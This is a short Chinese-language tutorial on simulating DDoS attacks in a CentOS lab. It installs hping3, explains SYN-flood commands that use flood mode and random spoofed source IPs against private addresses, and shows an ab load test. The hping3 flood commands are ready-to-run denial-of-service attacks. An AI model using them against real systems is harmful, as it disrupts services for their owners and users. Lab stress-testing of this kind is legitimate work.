centos系统ddos攻击,使用hping3和ab测试攻击模拟攻击
hping3工具
hping3 是一个命令行下使用的 TCP/IP 数据包组装/分析工具,通常 web 服务会用来做压力测试使
用,也可以进行 DOS 攻击的实验。同样 hping3 每次只能扫描一个目标。
安装hping3
bash
yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install例:使用 hping3 进行压力
hping3 -c 100000 -d 120 -S -p 80 --flood --rand-source 192.168.1.63
hping3 -c 100000 -d 120 -S -p 443 --flood --rand-source 192.168.1.63 # 攻击192.168.1.63的443端口
-c 100000 = 发送的数据包的数量。
-d 120 = 发送到目标机器的每个数据包的大小。单位是字节
-S = 只发送 SYN 数据包。
-p 80 = 目的地端口(80 是 WEB 端口)。你在这里可以使用任何端口。
--flood = 尽可能快地发送数据包,不需要考虑显示入站回复。洪水攻击模式。
--rand-source = 使用随机性的源头 IP 地址。
攻击的目标地址
上服务器查看,被攻击状态:
[root@xuegod63 ~]# netstat -antup | grep :80
发现了大量伪装的 IP 地址
ab性能测试工具
centos安装ab测试工具
yum install httpd-tools 安装httpd-tools软件包,该软件包包含了ab工具
ab -V 查看版本号
ab -c 100 -n 10000 https://192.168.1.100/ 模拟100个线程请求,10000次
上服务器查看,被攻击状态:top
【参考资料】
hping3拒绝服务攻击小结